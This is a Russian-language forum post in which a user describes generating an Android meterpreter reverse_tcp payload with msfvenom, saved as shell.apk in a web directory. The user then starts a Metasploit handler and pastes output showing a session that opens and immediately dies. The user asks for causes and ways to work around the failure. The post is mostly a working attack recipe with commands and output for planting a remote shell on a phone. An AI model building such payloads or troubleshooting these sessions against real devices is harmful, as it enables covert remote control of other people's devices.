
05.01.2017, 00:57
|
|
Познающий
Регистрация: 03.11.2015
Сообщений: 40
Провел на форуме: 7695
Репутация:
0
|
|
в общем вроде делаю всё по сценарию:
ОС Kali 2
мой_ip=192.168.0.103
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=8080 R > /var/www/shell.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 8080
exploit
собственно потом вижу это:
[*] Started reverse TCP handler on 192.168.0.103:8080
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.0.100
[*] Meterpreter session 1 opened (192.168.0.103:8080 -> 192.168.0.100:54636) at 2017-01-04 15:46:03 +0000
[*] 192.168.0.100 - Meterpreter session 1 closed. Reason: Died
[-] Invalid session identifier: 1
интересны возможные причины и способы их обойти/устранить
|
|
|